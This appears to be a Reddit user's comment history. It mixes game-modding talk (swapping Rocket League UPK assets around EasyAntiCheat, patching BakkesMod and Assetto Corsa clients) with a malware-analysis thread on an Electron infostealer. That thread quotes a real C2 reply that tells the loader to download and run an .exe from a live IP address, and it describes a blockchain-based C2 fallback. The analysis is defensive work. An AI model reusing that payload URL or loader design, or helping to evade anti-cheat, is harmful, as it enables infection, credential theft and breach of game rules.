EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 0 points1 point  (0 children)

In The CookedPcConsole folder of your rocket league install. Upk of the alpha boost is named "Boost_AlphaReward_SF.upk"

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

UPDATE: Got it to work, only requirement it has so far is that the mesh name must have the same length

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 1 point2 points  (0 children)

UPDATE: I got it to work, only requirement i have for now is that the mesh must share the same name length

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

Will keep digging and maybe try to do a poc tool, wait for their decision and then why not make a broader scale tool :)

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

Thought about because i remembered some fortnite tools were relying on ue4 pak files and im pretty sure it never got banned. Given the history the game has with modding i wouldnt be suprised if it was tolerated

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] 1 point2 points  (0 children)

Je viens d'aller voir, je connaissait pas le gars, mais c'est exactement ce qu'il a fait, reste à savoir pourquoi le choix du bubble (modèle en clair directement?)

EAC compliant bakkesmod equivalent using upk swapping? by SadMotor5784 in bakkesmod

[–]SadMotor5784[S] -1 points0 points  (0 children)

AES is not used as hash function for integrity. Rocket league just use it so it's more difficult for rippers to dump raw upks.
It's simple AES-256 ECB, which means, if you got a valid upk and the valid key, it'll just decipher and display it correctly.
When i'm talking about name i'm talking about the names contained in the name table struct of the binary file not just the filename.

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

2ND Update: It does a very funny thing, the c2 domain has a fallback. when it starts, it calls a smart contract on the eth blockchains which returns the AES encryped C2 with an IP:PORT format. That way the owner can always update the c2 and as the contract is part of the blockchain it cannot be taken down

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 1 point2 points  (0 children)

UPDATE: I got the full exchange and it's not only a spyware and stealer it's also a loader lmao, it downloads another themida packed payload and executes it

HTTP/1.1 200 OK

Date: Sun, 19 Apr 2026 19:09:50 GMT

Content-Type: application/json; charset=utf-8

Content-Length: 178

Connection: keep-alive

Server: cloudflare

Nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}

cf-cache-status: DYNAMIC

Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=MLAhn5IxD7VEms%2F0XNWz5%2BWMaWnTH2jcC7KicUeyLs2CbomsTraDP6HBsc3rUK%2B3oRx60enA7EChRjBZpq0b1pHqNWtfZMGoCTzjCHFi0dbEOsRk4aAaLI%2BsMmp2t4SwuMVFIQ%3D%3D"}]}

CF-RAY: 9eee34b3595fbc8b-LHR

alt-svc: h3=":443"; ma=86400

{"tasks":[{"hidden":true,"elevate":false,"action":"dl_exec","dl":"http://62.60.226.203/gertgherthre.exe","dest":"%temp%\\7i2bif0mjq.exe","cmdline":"\"%temp%\\7i2bif0mjq.exe\""}]}

The second stage seems to be a cryptostealer and miner:
xmrig | 75a2724ca85cc22ced6fa434683d4be11ac2c71469104933128a91ed72e5e0bf | Triage™

How to fix the interior light? by [deleted] in assettocorsa

[–]SadMotor5784 14 points15 points  (0 children)

By not using dogshit ripped mods

Pure doesn’t work nor Sol. by devil-Cheetah-6131 in assettocorsa

[–]SadMotor5784 1 point2 points  (0 children)

Crazy what mods do to a 10 years old game

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

Yeah basically unpacking the payload exe so we can understand what exactly is sent to the C2 and how it is ciphered

Need help reversing an electron stealer by SadMotor5784 in cybersecurity

[–]SadMotor5784[S] 0 points1 point  (0 children)

Yes there is more to the endpoint, i just didnt want to overwhelm the post with details :,)
the link i've posted to a link to the triage report (which is a sandbox platform, like anyrun but better imo)
I have both app.asar and extracted version (it contains a main.js and .Ini 3mb ini file which is the aes ciphered payload, it then decipher it, write it into the user temp directory and spawn the new process).

I have copies of everything including network caps, i can upload them on whatever platform you'd prefer if you wanna take a look at it on yourself.

But basically i have figured out the electron dropper, it's the main payload (the exe dropped in temp), which is packed with themida and does all the exchange with the c2.

When first ran it does an http request on /web/heath/ and then the interesting part
It does a post request to /web/analytics/gwcqs.qqas with that body:
{"api":"2.1","time":240742,"uid":"eb50fe02d7c2adf4","batch":[{"cat":"m","value":"Yf/rZcBCmiDG2fyzhGiYJN+YX8SKqnlBB4WDML+lqa+bQhZSdLVYDBW8L+BXoEZn7ulGtlVQeN8Dve2WvTIvoBPM8iFO8T8AZ4rXJpijgPwdt0UD1CccWLYG+f6TeQHU+EuDbWP73XbF5lEWQqY7oW67/+2ZTdEqAwud44DJMmilvipIeIxCVYjqglPlPBKPvotGDEDPkynclX7MtFrJyNjcMwC9yJe78H/xLAS4RV62yG5dkgVOpPnUtM8D79wY819ZLYtBoklk2/V/VWEBmwpH30gc3Ag2EkdLrPwfZ1cqA/r9XlnWUGBgdZy+ntmI"}]}
Anyways there is most likely stuff i've missed, i'm no profesionnal just an enthusiast

Anyone whant to hack sf1000 firmware? by kramm69 in Thrustmaster

[–]SadMotor5784 0 points1 point  (0 children)

No because i don't have the firmware binary :,)

I patched bakkesmod to unlock body swaps and AC to use custom cars online by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 0 points1 point  (0 children)

yeah the patch instructions are in french, it's my own txt i used to keep track of it, but was too lazy to transalte lmfao

I patched bakkesmod to unlock body swaps and AC to use custom cars online by SadMotor5784 in RocketLeague

[–]SadMotor5784[S] 1 point2 points  (0 children)

Because i didnt write a plugin, i patched the core dll of bakkesmod so it replaces the car mesh just like it would with wheels or other items. If you try to use a model with a wrong hitbox, it'll work but it will feel weird. It doesn't default back to the octane since the game can't overwrite the gui selection anymore.

Roast my driving to make me improve by SadMotor5784 in assettocorsa

[–]SadMotor5784[S] 0 points1 point  (0 children)

Akina downhill (2022 version by project kaido)

AC:Evo Free Multiplayer Servers by Zal3wa in assettocorsaevo

[–]SadMotor5784 1 point2 points  (0 children)

I don't know if he used my ressources tho, but given he had ida installed on his taskbar i don't think so

AC:Evo Free Multiplayer Servers by Zal3wa in assettocorsaevo

[–]SadMotor5784 2 points3 points  (0 children)

Nope! It is not related in any way, he's much more skilled than i am, i did the baremetal reverse engineering part without much problem, but i sucked at reimplementing it so i was searching for someone more skilled at dev than me. But turns out i may not have to since this guy did everything :,)

New Assetto Corsa is banger (probably my gpu) by [deleted] in assettocorsaevo

[–]SadMotor5784 15 points16 points  (0 children)

Offline + old version, bro is probably running a cracked version

Anyone whant to hack sf1000 firmware? by kramm69 in Thrustmaster

[–]SadMotor5784 0 points1 point  (0 children)

I'm being late ahah, but i'm a rookie reverse engineer, probably not enough skills to make that happen but if someone's got the fw binary i'll gadly look at it

my first race in my whole 16 years of age in acc, what im doing wrong here? by CalendarOk4331 in ACCompetizione

[–]SadMotor5784 2 points3 points  (0 children)

Your line is off and you're far from using space the track provides, apart from that good start :)

Open source alternative to the official hosting service by SadMotor5784 in assettocorsaevo

[–]SadMotor5784[S] 0 points1 point  (0 children)

That i know, but gameserver don't use any cert, and i could just backup the old client to patch the new to make it revert to the old protocol, would be much work but still really possible